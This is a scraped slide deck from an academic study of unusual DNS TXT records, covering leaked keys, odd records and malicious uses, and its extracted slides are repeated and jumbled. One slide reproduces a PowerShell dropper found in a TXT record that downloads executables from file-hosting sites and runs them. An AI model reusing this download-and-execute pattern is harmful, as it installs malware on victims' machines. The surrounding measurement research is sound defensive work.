txting 101 finding security issues in the long tail of
play

TXTing 101: Finding Security Issues in the Long Tail of DNS TXT - PowerPoint PPT Presentation

Jul 02, 2023 •513 likes •1.04k views

TXTing 101: Finding Security Issues in the Long Tail of DNS TXT Records O. van der Toorn 1 R. van Rijswijk-Deij 1 T. Fiebig 2 M. Lindorfer 3 A. Sperotto 1 2020-08-21 1 University of Twente, 2 TU Delft, and 3 TU Wien DNS TXT Records 1 DNS TXT

  1. TXTing 101: Finding Security Issues in the Long Tail of DNS TXT Records O. van der Toorn 1 R. van Rijswijk-Deij 1 T. Fiebig 2 M. Lindorfer 3 A. Sperotto 1 2020-08-21 1 University of Twente, 2 TU Delft, and 3 TU Wien

  2. DNS TXT Records 1

  3. DNS TXT Records 2 dig -t TXT 1.adventure.splode.com Contact details tide-project.nl o.i.vandertoorn@utwente.nl

  4. Outline Background Evolution of TXT records Undefjned Purpose Mistakes with a Security Implication Malicious Use Cases Takeaways 3

  5. Background

  6. Background: DNS TXT records • Allows for a subtle way to add functionality. • RFC1464 tries to add structure by defjning a key-value store. • RFC5507 discouraged TXT for new expansions. • Common uses of TXT records are: SPF, DKIM and DMARC. 4

  7. Background: DNS TXT records • Allows for a subtle way to add functionality. • RFC1464 tries to add structure by defjning a key-value store. • RFC5507 discouraged TXT for new expansions. • Common uses of TXT records are: SPF, DKIM and DMARC. 4

  8. Background: DNS TXT records • Allows for a subtle way to add functionality. • RFC1464 tries to add structure by defjning a key-value store. • RFC5507 discouraged TXT for new expansions. • Common uses of TXT records are: SPF, DKIM and DMARC. 4

  9. Background: DNS TXT records • Allows for a subtle way to add functionality. • RFC1464 tries to add structure by defjning a key-value store. • RFC5507 discouraged TXT for new expansions. • Common uses of TXT records are: SPF, DKIM and DMARC. 4

  10. 10 11 records). Dataset: OpenINTEL OpenINTEL an active DNS measurement platform. • 236 millon domains measured on a daily basis. • TXT records between 2015 and 2018 (1 2 5

  11. 10 11 records). Dataset: OpenINTEL OpenINTEL an active DNS measurement platform. • 236 millon domains measured on a daily basis. • TXT records between 2015 and 2018 (1 2 5

  12. Dataset: OpenINTEL OpenINTEL an active DNS measurement platform. • 236 millon domains measured on a daily basis. 5 • TXT records between 2015 and 2018 (1 . 2 × 10 11 records).

  13. Evolution of TXT records

  14. 6 Growth 200% Growth (%) 150% 100% 2015-07 2016-01 2016-07 2017-01 2017-07 2018-01 2018-07 Date Domains

  15. Growth 6 200% Growth (%) 150% 100% 2015-07 2016-01 2016-07 2017-01 2017-07 2018-01 2018-07 Date TXT records Domains

  16. TXT Records 7 80 M TXT records Number of 60 M 40 M 20 M 2015-07 2016-01 2016-07 2017-01 2017-07 2018-01 2018-07 Date Email Miscellaneous Patterns Verification Encoded Other

  17. Other TXT Records 8 1 M TXT records Number of 500 k 0 2015-07 2016-01 2016-07 2017-01 2017-07 2018-01 2018-07 Date Malicious Unclassified Undefined Purpose Mistakes

  18. Undefjned Purpose

  19. • Single Character TXT records Undefjned Purpose Type of records in this category: • Base 64 Encoded MX Records • Empty, or executable references 9

  20. • Single Character TXT records Undefjned Purpose Type of records in this category: • Base 64 Encoded MX Records • Empty, or executable references 9

  21. Undefjned Purpose Type of records in this category: • Base 64 Encoded MX Records • Empty, or executable references • Single Character TXT records 9

  22. Single Character Records wtmc@localhost:~$ dig -t TXT single_char.example.org single_char.example.org. 3600 IN TXT "@" 10

  23. Single Character Records 11 "~" "0" "@" records (log) Number of 1 M 1 k 1 2015-07 2016-01 2016-07 2017-01 2017-07 2018-01 2018-07

  24. Origin Tilde Character Records 12 40034 19905 13335 records (log) Number of 1 M 1 k 1 2015-10 2016-03 2016-08 2017-01 2017-06 2017-11 2018-04 2018-09

  25. Single Character Records • Might be used to identify domains • Does not have a security impact 13

  26. Single Character Records • Might be used to identify domains • Does not have a security impact 13

  27. Mistakes with a Security Implication

  28. • Public and Private Keys Mistakes with a Security Implication Type of records in this category: • Certifjcates 14

  29. Mistakes with a Security Implication Type of records in this category: • Certifjcates 14 • Public and Private Keys

  30. Public and Private Keys wtmc@localhost:~$ dig -t TXT key.example.org key.example.org. 3600 IN TXT "-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCqGKukO1De7zhZj6+ H0qtjTkVxwTCpvKe4eCZ0FPqri0cb2JZfXJ/DgYSF6vUpwmJG8wVQZK jeGcjDOL5UlsuusFncCzWBQ7RKNUSesmQRMSGkVb1/3j+skZ6UtW+5u 09lHNsj6tQ51s1SPrCBkedbNf0Tp0GbMJDyR4e9T04ZZwIDAQAB -----END PUBLIC KEY-----" 15

  31. Public and Private Keys 16 total public 120 private Number of records 100 80 60 40 20 0 2015-07 2016-01 2016-07 2017-01 2017-07 2018-01 2018-07

  32. Public and Private Keys At 2018-12-31 there were 89 domains exposing keys: • 54 exposed a single key • 55.6% expose a private key • 35 exposed two keys • 94.3% expose a matching key pair 17

  33. Public and Private Keys At 2018-12-31 there were 89 domains exposing keys: • 54 exposed a single key • 55.6% expose a private key • 35 exposed two keys • 94.3% expose a matching key pair 17

  34. Public and Private Keys At 2018-12-31 there were 89 domains exposing keys: • 54 exposed a single key • 55.6% expose a private key • 35 exposed two keys • 94.3% expose a matching key pair 17

  35. Public and Private Keys At 2018-12-31 there were 89 domains exposing keys: • 54 exposed a single key • 55.6% expose a private key • 35 exposed two keys • 94.3% expose a matching key pair 17

  36. Public and Private Keys At 2018-12-31 there were 89 domains exposing keys: • 54 exposed a single key • 55.6% expose a private key • 35 exposed two keys • 94.3% expose a matching key pair 17

  37. Public and Private Keys • May invalidate security measures like DKIM • Shows a misunderstanding of the security technology 18

  38. Public and Private Keys • May invalidate security measures like DKIM • Shows a misunderstanding of the security technology 18

  39. Malicious Use Cases

  40. • PowerShell Malicious Use Cases Type of records in this category: • Commands • JavaScript 19

  41. • PowerShell Malicious Use Cases Type of records in this category: • Commands • JavaScript 19

  42. Malicious Use Cases Type of records in this category: • Commands • JavaScript 19 • PowerShell

  43. PowerShell wtmc@localhost:~$ dig -t TXT powershell.example.org powershell.example.org. 3600 IN TXT ... 20

  44. Powershell } rm $g sleep 180; }; start $g } ren $c t.exe; catch {$a.DownloadFile(\'https://files.fm/down.php?i=<CODE D>\', $c); start $g } ren $c t.exe; try {$a.DownloadFile(\'https://filebin.ca/<CODE C>\', $c); else { ren $c t.exe; start $g } $a=(new-object net.webclient); catch {$a.DownloadFile(\'https://files.fm/down.php?i=<CODE B>\', $c); start $g } ren $c t.exe; try {$a.DownloadFile(\'https://filebin.ca/<CODE A>\', $c); if (gci -Path $p | where {$_.Name -like \'v4*\'}) { $p=$w+\'//Microsoft.NET//Framework\'; $g=$b+\'//t.exe\'; $c=$b+\'//t.txt\'; $w=$Env:WINDIR; $b=$Env:APPDATA; 21

  45. Bonus: Zoom verifjcation tokens 22 Adoption of Zoom verification tokens 14 k "regular" growth 2.19x more records WHO publishes news on the virus 12 k Many countries start to enforce WFH 500 .top domains adding Zoom tokens TXT record count Number of records 10 k 8 k 6 k 4 k 2 k 0 2019-01 2019-03 2019-05 2019-07 2019-09 2019-11 2020-01 2020-03 2020-05 2020-07 Date

  46. Takeaways

  47. Takeaways • The majority of DNS TXT use is well defjned. • We classify 99.54% of the TXT records in our dataset. 23

  48. Takeaways • The majority of DNS TXT use is well defjned. • We classify 99.54% of the TXT records in our dataset. 23

  49. Takeaways • The majority of DNS TXT use is well defjned. • We classify 99.54% of the TXT records in our dataset. 23

  50. Takeaways Analyzing the tail of the TXT records is not only a needle in the haystack problem, but also becomes a human intelligence problem. 24

  51. Takeaways Analyzing the tail of the TXT records is not only a needle in the haystack problem, but also becomes a human intelligence problem. 24 Used regular expressions tide-project.nl/blog/wtmc2020 Project website tide-project.nl

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

The Long Tail as a Pow g er Curve 120 100 80 60 40 40 20 0 1 1 11 11 21 21 31 31

The Long Tail as a Pow g er Curve 120 100 80 60 40 40 20 0 1 1 11 11 21 21 31 31

The Long Tail as a Pow g er Curve 120 100 80 60 40 40 20 0 1 1 11 11 21 21 31 31 41 41 W here the Long Tail Meets the Sneaky Exponential (Cum ulative V alue of Potential Intearctions) 10000 9000 8000 8000 7000 6000

651 views • 9 slides
Day 3 Long Tail SEO Google Analytics How Google Analytics can help with our Long Tail

Day 3 Long Tail SEO Google Analytics How Google Analytics can help with our Long Tail

Day 3 Long Tail SEO Google Analytics How Google Analytics can help with our Long Tail SEO Conversion Depending on your site, you have a goal in mind for your visitor. What are you looking for your visitor to do? What's a

922 views • 17 slides
Sharing is Caring in the Land of The Long Tail Samy Bengio Real life setting Real problems

Sharing is Caring in the Land of The Long Tail Samy Bengio Real life setting Real problems

Sharing is Caring in the Land of The Long Tail Samy Bengio Real life setting Real problems rarely come packaged as 1M images uniformly belonging to a set of 1000 classes 2 The long tail Well known phenomena where a small number

894 views • 41 slides
Race Condition Shared Data: 4 5 6 1 8 5 6 20 9 ? Synchronization and Deadlocks tail

Race Condition Shared Data: 4 5 6 1 8 5 6 20 9 ? Synchronization and Deadlocks tail

Race Condition Shared Data: 4 5 6 1 8 5 6 20 9 ? Synchronization and Deadlocks tail A[] (or The Dangers of Threading) Enqueue(): A[tail] = 20; A[tail] = 9; Jonathan Misurda tail++; tail++; thread jmisurda@cs.pitt.edu switch

282 views • 3 slides
The Long Tail(s) of the Law: An exploratory study Graham Greenleaf, Philip Chung &amp; Andrew

The Long Tail(s) of the Law: An exploratory study Graham Greenleaf, Philip Chung &amp; Andrew

The Long Tail(s) of the Law: An exploratory study Graham Greenleaf, Philip Chung &amp; Andrew Mowbray, AustLII Law via the Internet 2011 Conference, Hong Kong First rule of cross-examination Never ask a question if you dont know the

1.18k views • 28 slides
IAIR T TDS V VI: D Deali ling wit ith Long T Tail il Cla laim ims October 12, 2018

IAIR T TDS V VI: D Deali ling wit ith Long T Tail il Cla laim ims October 12, 2018

www.pwc.com IAIR T TDS V VI: D Deali ling wit ith Long T Tail il Cla laim ims October 12, 2018 Moderator: Barb Murray - Director, PwC Panelists: William Barbagallo, Managing Director, PwC Thomas Cunningham - Partner, Sidley Austin

503 views • 3 slides
Finding Bugs Last time Run-time reordering transformations Today Program Analysis for

Finding Bugs Last time Run-time reordering transformations Today Program Analysis for

Finding Bugs Last time Run-time reordering transformations Today Program Analysis for finding bugs, especially security bugs problem specification motivation approaches remaining issues CS553 Lecture Finding Bugs 2

461 views • 8 slides
Non-Cumulation Clauses and Long-Tail Claims in CGL Policies: Latest Developments Allocating

Non-Cumulation Clauses and Long-Tail Claims in CGL Policies: Latest Developments Allocating

Presenting a live 90-minute webinar with interactive Q&amp;A Non-Cumulation Clauses and Long-Tail Claims in CGL Policies: Latest Developments Allocating Liability Among Multiple Policies Triggered by Multi-Year Loss TUESDAY, MAY 7, 2013 1pm

1.12k views • 89 slides
Accept the Risk and Continue: Measuring the Long Tail of Government https Adoption Sudheesh

Accept the Risk and Continue: Measuring the Long Tail of Government https Adoption Sudheesh

Session 15: Crime and Protection Accept the Risk and Continue: Measuring the Long Tail of Government https Adoption Sudheesh Singanamalla, Esther Han Beol Jang Richard Anderson, Tadayoshi Kohno, Kurtis Heimerl University of Washington

525 views • 18 slides
Accept the Risk and Continue: Measuring the Long Tail of Government https Adoption Sudheesh

Accept the Risk and Continue: Measuring the Long Tail of Government https Adoption Sudheesh

Session 15: Crime and Protection Accept the Risk and Continue: Measuring the Long Tail of Government https Adoption Sudheesh Singanamalla, Esther Han Beol Jang Richard Anderson, Tadayoshi Kohno, Kurtis Heimerl University of Washington Presented

504 views • 29 slides
Moving Down the Long Tail of Word Sense Disambiguation with Gloss Informed Bi-encoders Terra

Moving Down the Long Tail of Word Sense Disambiguation with Gloss Informed Bi-encoders Terra

Moving Down the Long Tail of Word Sense Disambiguation with Gloss Informed Bi-encoders Terra Blevins and Luke Zettlemoyer The plant sprouted a new leaf. (n) (botany) a (n) buildings for (v) to put or set living organism... carrying on (a

450 views • 41 slides
Economics of Information Storage: The Value in Storing the Long Tail James Hughes 1975 History

Economics of Information Storage: The Value in Storing the Long Tail James Hughes 1975 History

Economics of Information Storage: The Value in Storing the Long Tail James Hughes 1975 History Density has grown 36%/yr: 1956: 2 kb/in 2 2005: 100 gb/in 2 Efficiency (B/$) grew 51%/yr: 1974: 200 MB disk drive price $450 k 1

723 views • 27 slides
The Intersection of Smart Grid Technology and Intellectual Property Issues Finding the Keys to

The Intersection of Smart Grid Technology and Intellectual Property Issues Finding the Keys to

The Intersection of Smart Grid Technology and Intellectual Property Issues Finding the Keys to the Smart Grid Ken Van Meter Principal, Energy and Cyber Services Lockheed Martin The Smart Grid is, and must be, a national priority Security

333 views • 9 slides
Race Condition Shared Data: 5 6 4 1 8 5 6 20 9 ? InterProcess Communication tail A[]

Race Condition Shared Data: 5 6 4 1 8 5 6 20 9 ? InterProcess Communication tail A[]

Race Condition Shared Data: 5 6 4 1 8 5 6 20 9 ? InterProcess Communication tail A[] Enqueue(): A[tail] = 20; A[tail] = 9; tail++; tail++; process switch Process A Process B Critical Regions Goals No two processes (threads)

265 views • 4 slides
Accept the Risk and Continue: Measuring the Long Tail of Government https Adoption Sudheesh

Accept the Risk and Continue: Measuring the Long Tail of Government https Adoption Sudheesh

Qualifying Evaluation Accept the Risk and Continue: Measuring the Long Tail of Government https Adoption Sudheesh Singanamalla University of Washington Understanding Web Communication Browse to www.cutepuppies.ext (

806 views • 42 slides
Bringing Long-Tail Microscopy &amp; Characterisation Data into the Light RAiD service

Bringing Long-Tail Microscopy &amp; Characterisation Data into the Light RAiD service

Bringing Long-Tail Microscopy &amp; Characterisation Data into the Light RAiD service Characterisation: Process of User Dataset Project ID probing and measuring the Projects Instrument ID * Native data structures and properties

259 views • 4 slides
Working from Home &amp; the State/Technology of Video Conferencing Mike Andrews Email:

Working from Home &amp; the State/Technology of Video Conferencing Mike Andrews Email:

Working from Home &amp; the State/Technology of Video Conferencing Mike Andrews Email: mike@mikea.com Twituer: @mikea YouTube: Mike Andrews LinkedIn: htups://www.linkedin.com/in/michael-andrews86 Facebook: MikeA0 Text: 847-986-9359 Working

750 views • 54 slides
FCA temporary rule changes for GI Branko Bjelobaba FCII Regulation &amp; Compliance Consultant

FCA temporary rule changes for GI Branko Bjelobaba FCII Regulation &amp; Compliance Consultant

FCA temporary rule changes for GI Branko Bjelobaba FCII Regulation &amp; Compliance Consultant Branko Ltd FCA compliance consultants * BIBA/AMII Compliance Manual * Engaging Events * Tailored Solutions 1 Todays event Thank you to

769 views • 43 slides
F&amp;HDC Net Zero Project Options Appraisal Workshop 17 September 2020 Agenda Project

F&amp;HDC Net Zero Project Options Appraisal Workshop 17 September 2020 Agenda Project

F&amp;HDC Net Zero Project Options Appraisal Workshop 17 September 2020 Agenda Project Update Results of Carbon Footprint Forecast to 2050 Options Appraisal Process and Output Current Projects Project

561 views • 17 slides
The SUSY Les Houches Accord Peter Skands (Fermilab) : SUSY Conventions and the emergence of SLHA.

The SUSY Les Houches Accord Peter Skands (Fermilab) : SUSY Conventions and the emergence of SLHA.

TeV4LHC WS Feb 04 Brookhaven Physics Landscapes Session The SUSY Les Houches Accord Peter Skands (Fermilab) : SUSY Conventions and the emergence of SLHA. (+ Quick overview of SUSY RGE/ME/MC/... codes.) : Results of

529 views • 22 slides
THE TRIALS AND TRIUMPHS OF SHADOZ (SOUTHERN HEMISPHERE ADDITIONAL OZONESONDES): THE WHOS WHO

THE TRIALS AND TRIUMPHS OF SHADOZ (SOUTHERN HEMISPHERE ADDITIONAL OZONESONDES): THE WHOS WHO

THE TRIALS AND TRIUMPHS OF SHADOZ (SOUTHERN HEMISPHERE ADDITIONAL OZONESONDES): THE WHOS WHO OF TROPICAL OZONE PROFILES Jacquie Witte (NASA/GSFC, SSAI) Anne Thompson (NASA/GSFC) Bryan Johnson (NOAA/GMD) Samuel Oltmans (NOAA/GMD) Patrick

706 views • 12 slides
Risk Management for Whales Rama Cont and Lakshithe Wagalath Imperial College, London and IESEG

Risk Management for Whales Rama Cont and Lakshithe Wagalath Imperial College, London and IESEG

Introduction and motivation Modeling liquidation losses and liquidation-adjusted VaR Taming the Whale Conclusion Risk Management for Whales Rama Cont and Lakshithe Wagalath Imperial College, London and IESEG School of Management, Paris Rama

308 views • 29 slides
pyramid model of F2P design N Nicholas Lovell GDC Next Nicholas Lovell, GAMESbrief Author:

pyramid model of F2P design N Nicholas Lovell GDC Next Nicholas Lovell, GAMESbrief Author:

Where the Whales live: the pyramid model of F2P design N Nicholas Lovell GDC Next Nicholas Lovell, GAMESbrief Author: The Curve , How to Publish a Game, Design Rules for Free-to- Play Games Director, GAMESbrief Clients have

800 views • 55 slides
Whale Watching: Whale Watching: A Sustainable Solution A Sustainable Solution Whale Watching

Whale Watching: Whale Watching: A Sustainable Solution A Sustainable Solution Whale Watching

Whale Watching: Whale Watching: A Sustainable Solution A Sustainable Solution Whale Watching is the most sustainable Whale Watching is the most sustainable use of whales in the 21 st st century. century. use of whales in the 21

307 views • 12 slides

More recommend